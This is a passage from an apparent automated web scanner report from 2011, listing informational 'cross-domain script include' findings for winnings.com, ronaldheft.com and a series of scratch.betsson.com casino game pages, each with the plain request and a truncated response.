Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=mi99ov4036kkfgf2v89k0a5qg6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=pt; expires=Wed, 15-Jun-2011 12:23:56 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:23:56 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=pt; expires=Wed, 15-Jun-2011 12:23:56 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123196; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540573; expires=Tue, 15-May-2012 12:23:57 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:23:58 GMT
Connection: close
Content-Length: 23185

<!DOCTYPE html>
<html dir="ltr" lang="pt-PT">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - O Destino #1 para Entretenimento e Ganhos Online!..| Winnings.com</title>
<link rel="alternat
...[SNIP]...
<link rel="pingback" href="http://pt.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.40. http://ronaldheft.com/code/analyticator/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ronaldheft.com
Path:   /code/analyticator/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /code/analyticator/ HTTP/1.1
Host: ronaldheft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:52 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<!-- /footer -->


   <script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
   <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/ronaldheft.json?callback=twitterCallback2&amp;count=1"></script>
...[SNIP]...

19.41. https://scratch.betsson.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/?navbar=true HTTP/1.1
Host: scratch.betsson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u41q3c55gc42at45o0pmid55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u41q3c55gc42at45o0pmid55; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:45:00 GMT
Content-Length: 160229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.42. https://scratch.betsson.com/en/Casino

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Casino HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:37 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:37 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:37 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:37 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:56:37 GMT
Connection: close
Content-Length: 102596


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.43. https://scratch.betsson.com/en/Casino/Bingo-Bonanza

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Bingo-Bonanza

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Casino/Bingo-Bonanza HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:29 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:29 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:29 GMT
Connection: close
Content-Length: 102704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.44. https://scratch.betsson.com/en/Casino/Bubble-Bingo

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Bubble-Bingo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Casino/Bubble-Bingo HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:14 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:14 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:14 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:14 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:13 GMT
Connection: close
Content-Length: 102699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.45. https://scratch.betsson.com/en/Casino/Disco-Keno

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Disco-Keno

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Casino/Disco-Keno HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:38 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:38 GMT
Connection: close
Content-Length: 102694


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.46. https://scratch.betsson.com/en/Casino/HiLo

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/HiLo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Casino/HiLo HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:49 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:49 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:49 GMT
Connection: close
Content-Length: 102704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.47. https://scratch.betsson.com/en/Casino/Lucky-21

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Lucky-21

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Casino/Lucky-21 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:32 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:32 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:32 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:32 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:31 GMT
Connection: close
Content-Length: 102686


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.48. https://scratch.betsson.com/en/Casino/Namaste

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Namaste

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Casino/Namaste HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:55 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:55 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:55 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:55 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:56 GMT
Connection: close
Content-Length: 102686


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.49. https://scratch.betsson.com/en/Casino/Poker-King

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Poker-King

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Casino/Poker-King HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:37 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:37 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:37 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:37 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:36 GMT
Connection: close
Content-Length: 102699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.50. https://scratch.betsson.com/en/Casino/Roulette

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Roulette

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Casino/Roulette HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:44 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:44 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:44 GMT
Connection: close
Content-Length: 102684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.51. https://scratch.betsson.com/en/Casino/Royal-Slots

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Royal-Slots

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Casino/Royal-Slots HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:17 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:17 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:17 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:17 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:16 GMT
Connection: close
Content-Length: 102699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.52. https://scratch.betsson.com/en/Casino/Slot-Super-7

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Slot-Super-7

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Casino/Slot-Super-7 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:16 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:16 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:16 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:16 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:16 GMT
Connection: close
Content-Length: 102704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.53. https://scratch.betsson.com/en/Classic

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Classic HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:15 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:15 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:56:14 GMT
Connection: close
Content-Length: 102590


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
